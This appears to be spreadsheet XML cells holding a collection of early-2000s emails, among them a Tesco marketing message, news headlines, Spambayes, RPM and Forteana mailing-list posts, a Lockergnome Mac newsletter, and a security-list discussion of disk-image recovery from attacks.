 NAME=3D"remember"&gt;&lt;AREA SHAPE=3D"RECT" COORDS=3D"0,0,57,14" HREF=3D"http://=
 www.twelvehorses.com/mm/Clickthrough/23317062/27021558/23333143/uBn6_sdjVJ8=
 Dmr08mYuLuACBQH4A/*http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Dr=
 emember*http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Dremember"&gt;&lt;/=
 MAP&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table=
 &gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cel=
 lpadding=3D"8"&gt;&lt;tr&gt;&lt;td&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, sans-seri=
 f"&gt;&lt;A HREF=3D"http://www.twelvehorses.com/mm/Clickthrough/23317062/27021558=
 /23333143/uBn6_sdjVJ8Dmr08mYuLuACBQH4A/*http://www.twelvehorses.com/en_US/w=
 rapper/forward.jhtml*http://www.twelvehorses.com/en_US/wrapper/forward.jhtm=
 l" TARGET=3D"_blank"&gt;&lt;FONT FACE=3D"Arial,Helvetica,sans-serif"&gt;&lt;B&gt;Forward t=
 his email to a friend so they also can take advantage of these great offers=
  too!&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;FONT FACE=3D"=
 Arial,Helvetica,sans-serif"&gt;At Tesco we've got Christmas covered.&lt;/FONT&gt;&lt;/P=
 &gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px=
  0px 0px"&gt;&lt;FONT FACE=3D"Arial,Helvetica,sans-serif"&gt;Tesco.ie&lt;/FONT&gt;&lt;/font&gt;&lt;=
 /td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellp=
 adding=3D"8"&gt;&lt;tr&gt;&lt;td width=3D"50%" valign=3D"top"&gt;&lt;FONT FACE=3D"Arial,Helve=
 tica,sans-serif"&gt;&lt;img border=3D"0" src=3D"http://www.12hs.com/images/tesco/=
 10/tesco_ie_bot.gif" usemap=3D"#www"&gt;&lt;MAP NAME=3D"www"&gt;&lt;AREA SHAPE=3D"RECT"=
  COORDS=3D"0,0,111,22" HREF=3D"http://www.twelvehorses.com/mm/Clickthrough/=
 23317062/27021558/23333143/uBn6_sdjVJ8Dmr08mYuLuACBQH4A/*http://www.twelveh=
 orses.com/wrapper/doc_view.jhtml?d=3Dwww*http://www.twelvehorses.com/wrappe=
 r/doc_view.jhtml?d=3Dwww"&gt;&lt;/MAP&gt;&lt;/FONT&gt;&lt;/td&gt;&lt;td width=3D"50%" valign=3D"bot=
 tom" align=3D"right"&gt;&lt;img src=3D"http://www.12hs.com/images/tesco/10/everyl=
 ittlehelps.gif" width=3D"120" height=3D"52" border=3D"0"&gt;&lt;/td&gt;&lt;/P&gt;         =
      &lt;/tr&gt;             &lt;/table&gt;           &lt;/td&gt;         &lt;/tr&gt;       &lt;/table=
 &gt;     &lt;/td&gt;   &lt;/tr&gt;&lt;/table&gt;&lt;table width=3D"600" border=3D"0" cellspacing=3D=
 "0" cellpadding=3D"4"&gt;   &lt;tr&gt;      &lt;td&gt;        &lt;table width=3D"100%" border=
 =3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;         &lt;tr&gt; &lt;P style=3D"margin=
 : 0px 0px 0px 0px"&gt;          &lt;td&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica,=
  sans-serif"&gt;&lt;b&gt;&lt;FONT FACE=3D"Arial,Helvetica,sans-serif"&gt;&lt;img border=3D"0"=
  src=3D"http://www.12hs.com/images/tesco/9/clubcard.gif" usemap=3D"#clubcar=
 d"&gt;&lt;MAP NAME=3D"clubcard"&gt;&lt;AREA SHAPE=3D"RECT" COORDS=3D"0,0,120,57" HREF=
 =3D"http://www.twelvehorses.com/mm/Clickthrough/23317062/27021558/23333143/=
 uBn6_sdjVJ8Dmr08mYuLuACBQH4A/*http://www.twelvehorses.com/wrapper/doc_view.=
 jhtml?d=3DClubCard*http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3DC=
 lubCard"&gt;&lt;/MAP&gt;&lt;/FONT&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/P&gt;          &lt;td align=3D"right"&gt;&lt;fo=
 nt size=3D"2" face=3D"Arial, Helvetica, sans-serif" color=3D"#000099"&gt;&lt;b&gt;Re=
 member              you earn Clubcard points on every purchase&lt;/b&gt;&lt;/font&gt;&lt;/=
 td&gt;         &lt;/tr&gt;  &lt;/table&gt;&lt;font size=3D"1" face=3D"Arial, Helvetica, sans-=
 serif"&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px=
  0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;All products are subject=
  to availability while stocks last&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;=
 &amp;nbsp;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;* Customer quotas apply. Max=
 imum purchase of one case each of spirits per customer.  Maximum purchase o=
 f six beer cases per customer.&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&amp;nbs=
 p;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;Online prices may vary from thos=
 e charged in-store. Reduction will be made at the bottom of your till recie=
 pt.&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;P style=3D"margin: 0=
 px 0px 0px 0px"&gt;Prices in this email are correct at the time of production =
 and are subject to change. Please see website for latest prices.&lt;/P&gt;&lt;P styl=
 e=3D"margin: 0px 0px 0px 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px=
 "&gt;If you would prefer not to receive emails with news and special offers fr=
 om Tesco.ie, please click here: &lt;A HREF=3D"http://www.twelvehorses.com/mm/C=
 lickthrough/23317062/27021558/23333143/uBn6_sdjVJ8Dmr08mYuLuACBQH4A/*http:/=
 /www.tesco.ie/register/unsubscribe.asp?from=3Djm@jmason.org*http://www.tesc=
 o.ie/register/unsubscribe.asp?from=3D" TARGET=3D"_blank"&gt;&lt;FONT FACE=3D"Aria=
 l,Helvetica,sans-serif"&gt;Unsubscribe&lt;/FONT&gt;&lt;/A&gt;.&lt;/P&gt;&lt;P style=3D"margin: 0px =
 0px 0px 0px"&gt;It may take up to five working days to unsubscribe.&lt;/font&gt; &lt;/t=
 d&gt;&lt;/P&gt; &lt;/tr&gt; &lt;/table&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;&lt;TABLE ID=3D"table2" BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WID=
 TH=3D507&gt;&lt;tr width=3D507 BGCOLOR=3D"#ffffff" &gt;&lt;td width=3D65&gt;&amp;nbsp;&lt;/td&gt;&lt;td=
  width=3D135&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D107&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D135&gt;&amp;nbsp;&lt;/=
 td&gt;&lt;td width=3D65&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;TR  BGCOLOR=3D"#ffffff"  &gt;&lt;TD WIDTH=3D30=
 7 ALIGN=3DLEFT COLSPAN=3D3 &gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF=3D"http://www.twelvehorses.=
 com/en_US/wrapper/unsubscribe.jhtml?m=3D27021558&amp;c=3D23333143&amp;w=3D23317062&amp;=
 h=3DuBn6_sdjVJ8Dmr08mYuLuACBQH4A"&gt;&lt;FONT COLOR=3D"#000000" FACE=3D"Arial,Hel=
 vetica,sans-serif" SIZE=3D1&gt;-&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/TD&gt;&lt;TD ALIGN=3DRIGHT =
 VALIGN=3DCENTER WIDTH=3D200 COLSPAN=3D2&gt;&lt;IMG SRC=3D"http://www.twelvehorses=
 .com/mm/MarkRead?m=3D27021558&amp;c=3D23333143&amp;w=3D23317062&amp;h=3DuBn6_sdjVJ8Dmr0=
 8mYuLuACBQH4A" BORDER=3D0 ALT=3D" " HEIGHT=3D40 WIDTH=3D108 &gt;&lt;/TD&gt;&lt;/TR&gt;&lt;tr =
 width=3D507 BGCOLOR=3D"#ffffff" &gt;&lt;td width=3D65&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D135&gt;=
 &amp;nbsp;&lt;/td&gt;&lt;td width=3D107&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D135&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=
 =3D65&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/TABLE&gt;
 ------=_Part_2067_1947928.1038245405702--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Human-chimp DNA difference trebled
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8182249,1440/
 Date: Not supplied
 We are more unique than previously thought, according to new comparisons with 
 the genetic code of our closest relatives
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Spambayes] Guidance re pickles versus DB for Outlook
</t>
  </si>
  <si>
    <t xml:space="preserve">So then, "Mark Hammond" &lt;mhammond@skippinet.com.au&gt; is all like:
 &gt; So, given that, ZODB is sounding attractive.  I would package it up, so a
 &gt; few hundred extra K is probably no big deal.  The code could fall back to
 &gt; the slow-loading pickles, so people running from source still work, just
 &gt; possibly not as well.
 I haven't used ZODB much really but it sure looks like the Right Way.  I
 don't think it will fly with the unwashed Unix masses, but it sounds
 like a piece of cake with the Windows crowd.  That makes sense; you only
 have one OS vendor and one processor family to support.
 I'm going to go sulk in /dev/corner now.
 Neale
 _______________________________________________
 Spambayes mailing list
 Spambayes@python.org
 http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Cosmic polarisation detected from South Pole
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8052857,1440/
 Date: Not supplied
 The faint microwave afterglow of the Big Bang is polarised - the discovery 
 should help probe the birth of the Universe
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message ----- 
 From: "James Rogers" &lt;jamesr@best.com&gt;
 &gt; 
 &gt; It is worth noting that underneath the receding glaciers deposited
 &gt; during the last major ice age, they are finding substantial evidence of
 &gt; humans living in what was a nice temperate climate before the glaciers
 &gt; paved over their civilization.  The receding glaciers have turned into a
 &gt; bit of an archaeological treasure chest, as they expose artifacts buried
 &gt; in and underneath them as they shrink that have been preserved by the
 &gt; ice for thousands of years.
 Got bits?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Crop Idol: Crop circle competition
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From todays Sun:
 http://www.thesun.co.uk/article/0,,5-2002392050,00.html
 Your vote on Crop Idol 
 By OLIVER HARVEY
 WELCOME to Crop Idol  your chance to choose Britain's most out-of-this-wor=
 ld corn circle. 
 The intricate patterns, which some say are the work of aliens, are big news=
  again thanks to the spooky new Mel Gibson film Signs.
 Nine of the best are shown on the right. You can vote for your favourite by=
  clicking on the image and dialling the number shown beneath.
 Calls cost only 10p, or 12 cents from the Republic of Ireland (though it ma=
 y be a bit more if you contact us from other planets).
 Lines close at 6pm today. We will reveal the
 winner tomorrow.
 Aliens ... or hoaxers?
 THE debate continues to rage over the origin of crop circles.
 Many believe they are simply the work of human hoaxers  while others are c=
 onvinced they are made by aliens trying to communicate with us.
 Crop circle enthusiasts insist that some of the designs appear so quickly a=
 nd on such a vast scale that it is impossible for humans to have made them. =
 Witnesses even claim to have seen balls of light moving through the fields =
 on the nights that circles appear.
 Researchers have found connections between some patterns and symbols from a=
 ncient religions, mathematics and even music. 
 Crop circles were first spotted in Britain in the early 1970s and now appea=
 r throughout the world. The weird outlines are still most common in the sout=
 h of England.
 Theories about their cause include whirlwinds  known to circle experts as =
 plasma vortexes  earth energies from ley lines or even forces from the huma=
 n mind.
 In the past the circles have also been blamed on mating roe deer, hedgehogs=
 , helicopters and holes in the ozone layer.
 Raymond Cox, Chairman of the Centre for Crop Circle Studies, said last nigh=
 t: "It's a great unsolved mystery.
 "We know not all crop circles are created by humans but we cannot say for s=
 ure what is making them."
 Plus lots of photos
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Apple Core]  Intuitive Cash
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/applecore/20020716.html"&gt;
       http://www.lockergnome.com/issues/applecore/20020716.html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#14367A }
  a:link    { COLOR: #2E64DC; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { COLOR: GRAY; text-decoration: none }
  a:hover   { color: GRAY; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #2E64DC; BORDER-BOTTOM: #14367A 4px solid; BORDER-LEFT: #94B2EE 4px solid; BORDER-RIGHT: #14367A 4px solid; BORDER-TOP: #94B2EE 4px solid; COLOR: #FFFFFF; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #94B2EE; BORDER-BOTTOM: #2E64DC 3px solid; BORDER-LEFT: #FFFFFF 3px solid; BORDER-RIGHT: #2E64DC 3px solid; BORDER-TOP: #FFFFFF 3px solid; COLOR: #14367A; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020716 Lockergnome Apple Core&lt;/title&gt;&lt;/head&gt;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color="#14367A" face="Verdana, Tahoma, Arial" style="font-size: 10pt" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;
 &amp;nbsp; 07.16.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font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Of the comments I received on AppleScript, every single one suggested I 
 start with the basics, for that reason,  I'm going to take things 
 step-by-step,  following my own learning process and progressing to 
 gradually more difficult concepts. Despite having experience in 
 programming, using a variety of languages, I initially found AppleScript 
 to be quite intimidating -- mostly because something about the Script 
 Editor seems less than intuitive. If you've already been dabbling in 
 scripting, the first few columns on the subject will definitely be 
 targeted at novices, but I want to everyone to have the chance to get 
 up to speed.
 &lt;p&gt;
 I'm off to the 
 &lt;a href="http://www.sic.org"&gt;Shareware Industry Conference&lt;/a&gt; for the remainder of the week, 
 where it's looking like the selection of stuff for Mac users will be very 
 bleak. I believe the organization is targeted more toward the Windows 
 community in general and any shareware developer with enough cash to get 
 there is probably going to be in New York for MacWorld. I'll be missing 
 out on the Web cast of Steve Jobs speech, which is scheduled to take place 
 while I'm in the car, but at least I'll be able to catch the details at 
 other Mac sites when I get to St. Louis. Internet access for the trip is 
 being provided by Crosspaths.net, which is one of the few dialup services 
 I've found that can be configured to relay my Lockergnome mail so that I 
 can still function on the road. I tested the service on my iBook this 
 evening just to be sure.
 &lt;p&gt;
 With some luck, I may be able to get Internet access from the highway, via 
 my Kyocera 6035, and see what Jobs had to say before I get to St. Louis. 
 Unfortunately, there's no support for OS X yet with the 6035, so I can't 
 use the unlimited nights and weekends to dial the Web from my laptop. A 
 landline will probably be more sensible anyway. Check my blog for some 
 updates on the trip, Lori's attending too and I'm sure she'll be taking 
 lots of photos, as usual.
 &lt;p align="right"&gt;See You in &lt;a target="_blank" href="http://www.gnomedex.com/"&gt;August&lt;/a&gt;,&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;font style="font-size: 23pt" face="Jake Ludington, Script" size="5"&gt;Jake Ludington&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/P&gt;
 &lt;!-- DOWNLOADS --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDOWNLOADS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Same-X v2.0 [1.73MB] OSX 10.1.1 FREE&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.thumpbunny.com/"&gt;http://www.thumpbunny.com/&lt;/a&gt;&lt;p&gt;
 Seven themes, two board sizes and your choice of difficulty levels, makes 
 this a game for the entertainment addict in all of us. The object is to 
 clear the board of all icons, removing them in matching clusters of two 
 or greater at a time. Clearing the screen awards bonus points and scoring 
 awards clearing of larger clusters. Nothing gets killed, there's no 
 swearing, but you'll find yourself addicted to the mindless fun anyway -- 
 not to mention you can feel safe sharing this with kids.
 &lt;!-- GnomeNETWORK --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeNETWORK&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Samba Sharing Package v1.5 [8.3MB] OS X FREE&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://xamba.sourceforge.net/ssp/"&gt;http://xamba.sourceforge.net/ssp/&lt;/a&gt;&lt;p&gt;
 It remains to be seen whether 10.2 will render this type of application 
 unnecessary, but for those out there without the cash to spend on DAVE, 
 for small office or home networking of Mac/PC mixed environments, this 
 is the only real alternative. Installation and configuration is almost 
 painless, making it easy for your Windows machine to see apps on your 
 Mac with little difficulty. The interface, like most OS X GUI apps, is 
 quite easy to navigate, including user management, connection 
 management, and share configuration into a convenient Prefernce pane.
 &lt;!--  GnomeSCRIPT --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSCRIPT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 Technically speaking, you could do most of your script writing in a text editing 
 application like TextEdit, but ultimately you've got to compile it in the Script 
 Editor, so you might as well start there. The Script Editor is located in the 
 AppleScript subfolder of your Applications folder. Opening the application for 
 the first time reveals a small window divided in to two sections, Description 
 and the actual scripting pane, separated by a group of buttons.
 &lt;p&gt;
 Ignore the buttons for the moment and concentrate on the two text panes. The 
 Description pane is where you label your script, so you can remember later what 
 it does. This is also the place you denote the key combination that will invoke 
 your script. If you choose to save your script as an executable application, the 
 information in the description will show up in the start up screen.
 &lt;p&gt;
 The second pane is where the magic happens. In this pane you will be telling 
 applications to do specific tasks when your script runs. The format for scripting 
 is fairly linear. You either start your script at the top most level drilling 
 down, until you actually reach the application or object you want to manipulate 
 with your script, or you take the reverse approach manipulating things from the 
 bottom up. Telling the "Applications" folder to tell its "Jake" subfolder to tell 
 the application "Jake's Media Player," located in that folder to do something 
 could also be written by telling the script to access "Jake's Media Player" 
 located in the "Jake" subfolder of the "Applications folder,  The upcoming example 
 will make this a bit more clear.
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Buy One Inkjet Cartridge - GET TWO FREE!!&lt;/b&gt; 
 Buy 1 Get 2 FREE on Most Epson, Canon, and Apple
 Cartridges. Wholesale Pricing on Lexmark Cartridges.
 Free Shipping on orders $25 or more!! U.S. Shipping Only.
 &lt;a href="http://psstt.com/1/c/22869/56049/191532/191532"&gt;Click Here For a Complete List of Cartridges&lt;/a&gt;.   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- FAVORITE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Glitschka.com&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.glitschka.com"&gt;http://www.glitschka.com&lt;/a&gt;&lt;p&gt;
 Flash animations,  downloadable icons, artistic doodles, and details about 
 the artist himself are available from this site. You're guaranteed to find 
 something entertaining here, and if you need a logo designed, Von Robert 
 Glitschka might even take you on as a client. The portfolio is extensive, 
 including stock images and even some icons by the artist's seven year old 
 daughter. A must read is the anatomy of an illustration section, which lays 
 down artistic opinion, straight from Glitschka's mouth on how to make a 
 funny creation. This is by no means a Mac only site, the entertainment is 
 accessible by everyone and icons are available in both Mac and PC versions.
 &lt;!-- GnomeTIP --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeTIP&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 Traditionally, Mac OS has always placed a link to various disks in use on the 
 desktop, which can be convenient, but is no longer necessary with the Finder 
 only a Command+Tab away in the Dock. My personal desktop is usually cluttered 
 with files I've downloaded from the Internet, so I can never find anything 
 when my desktop is in plain sight, the Finder is the only way I stay organized. 
 For desktop slobs like me, or for neat freaks who want nothing on the desktop, 
 OS X includes three handy options for keeping disks in their place. Open the 
 Finder Preferences window and uncheck the three checkboxes under Show these 
 items on the Desktop. You'll have more space for other icons to clutter the 
 desktop or in the case of you clean folk, you'll have nothing at all.
 &lt;p class="url" align="right"&gt;Tip by &lt;a href="mailto:jake@lockergnome.com?subject=Tip Feedback"&gt;Jake&lt;/a&gt;
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/applecore/20020716.html"&gt;http://www.lockergnome.com/issues/applecore/20020716.html&lt;/a&gt;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color="#14367A" face="Verdana, Tahoma, Arial" style="font-size: 8pt"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href="https://www.sandhills.com/secure/smartcomputing/cpufreetrial.asp?source=cpu235"&gt;Computer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amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#116;&amp;#111;&amp;#58;&amp;#102;&amp;#101;&amp;#101;&amp;#100;&amp;#98;&amp;#97;&amp;#99;&amp;#107;&amp;#64;&amp;#108;&amp;#111;&amp;#99;&amp;#107;&amp;#101;&amp;#114;&amp;#103;&amp;#110;&amp;#111;&amp;#109;&amp;#101;&amp;#46;&amp;#99;&amp;#111;&amp;#109;?subject=Lockergnome Apple Core Comment"&gt;E-mail the Editors&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p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src="http://www.lockergnome.com/images/webcam/jakecam.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;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</si>
  <si>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Re: advice on 7.3.92 to 7.3.93, and Apt compiling (oh joy)
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou (matthias@egwn.net) wrote*:
 &gt;Then why bother : The new Red Hat Linux beta "(null)" is now available and
 &gt;should be announced anytime now. It contains rpm 4.1-0.81.
 Ahhh ... this is funny. Last night I upgraded to Limbo II (.93).
 Installed Limbo II kernel, Installed libstdc++ from rawhide (rpm -ivh) so the
 newer apt would work, told apt it is OK to have multiple of libstdc++, copied
 the actual rawhide "libstdc++.so.5.0.0" file to another directory, removed that
 rawhide libstdc++ package, installed (rpm -ivh ) the Limbo II libstdc++ package
 (new apt does not like it), make that symlink "libstdc++.so.5" point to that
 rawhide file I moved earlier.
 Apt works again, dump the Limbo II rpms into a dir, run the "genaptrep.sh rh73",
 but "topdir" arg had changed, edit script, rerun, makes apt repository for Limbo
 II. Do "apt-get --ignore missing -f dist-upgrade". Apt wants to uninstall itself
 because that rawhide libstdc++ package is not installed, but apt works for the
 moment because of that symlink I made.
 Apt stays installed just long enough to issue the necessary "dist-upgrade"
 commands, several hours later, I have Limbo II, shiny and new. The install even
 made that symlink point back to the correct libstdc++ file.
 Several hours after that, I read my mail and realize that "null" directory I kept
 seeing while downloading Limbo II was not a fluke.
 Ahh, the joy. Repeat the above ....
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: use of base image / delta image for automated recovery from
</t>
  </si>
  <si>
    <t xml:space="preserve">
 -----Original Message-----
 From: Crispin Cowan [mailto:crispin@wirex.com]
 Sent: Wednesday, September 04, 2002 7:30 PM
 To: Ben Mord
 Cc: Webappsec Securityfocus.Com; SECPROG Securityfocus
 Subject: Re: use of base image / delta image for automated recovery from
 attacks
 Ben Mord wrote:
 &gt;&gt;     -----Original Message-----
 &gt;&gt;     *From:* Crispin Cowan [mailto:crispin@wirex.com]
 &gt;&gt;     *Sent:* Wednesday, September 04, 2002 5:46 PM
 &gt;&gt;     *To:* Ben Mord
 &gt;&gt;     *Cc:* Webappsec Securityfocus.Com; SECPROG Securityfocus
 &gt;&gt;     *Subject:* Re: use of base image / delta image for automated
 &gt;&gt;     recovery from attacks
 &gt;&gt;
 &gt;&gt;     Ben Mord wrote:
 &gt;&gt;
 &gt;&gt; My proposed solution to the first two problems you mention is to be
 &gt;&gt; less ambitious. The idea is that you *never* commit - instead, you
 &gt;&gt; simply revert to base state on reboot.
 &gt;Ah. In that case, you can use something considerably less powerful than
 &gt;VMWare. All you need is a machine configured to boot from CD-ROM and use
 &gt;a RAM disk for scratch space. Numerous Linux distros are available that
 &gt;let you boot a stateless but functional system from CD-ROM.
 But RAM is expensive, and the directory structures of many systems (e.g.
 Windows) are not sufficiently organized and standardized to make this
 combination of bootable CDs and RAM drives practical. Even if you are
 fortunate enough to be using Linux (or another FHS-compliant *nix), you
 still can't fit a lot on a CD. Its not unusual today to have gigabytes of
 static multimedia content on the web server. This particular problem can be
 alleviated somewhat by using DVDs, but this is a temporary solution at best
 which will become outdated quickly as our data requirements grow and hard
 drives become cheaper.
 &gt;&gt; Obviously, you can't do this with partitions that accrue important
 &gt;&gt; state, e.g. a partition that stores database table data.
 &gt;... but if you *do* want some state to persist, then you need a
 &gt;mountable writable partition. To protect it, you need some kind of
 &gt;access control management to decide who can do what to the writable
 &gt;partition, blah blah blah ... and before you know it, the security
 &gt;problem starts to look just like it does for conventional servers.
 Right. This is why you would consolidate all state of any long-term
 significance on just a couple partitions, and why you would not put static
 application code on these changeable partitions. Fortunately, most large
 client/server application physical architectures do this anyhow, because
 these are two fundamentally different kinds of state with two very different
 sets of administrative, security, RAID, and backup requirements. People also
 tend to do this anyhow because layered logical architectures are popular
 with the GUI at one end, business logic in the middle, and persistence
 services at the other. This logical architecture maps naturally to a
 physical architecture that has a static web server, a static application
 server, and a database server that has static and changeable partitions. (I
 use the word static versus changeable instead of writeable versus unwritable
 because the "unchangeable" partitions might be written to for temporary swap
 space. Who knows what Windows does internally?)
 My point is that there should be a market out there for a hardware RAID
 device that can split designated partitions into a permanent base image
 partition and a temporary delta image partition, that has some simple but
 solid security measures to prevent the unauthorized remote modification of
 base images, and that can be configured to clear the delta image when the
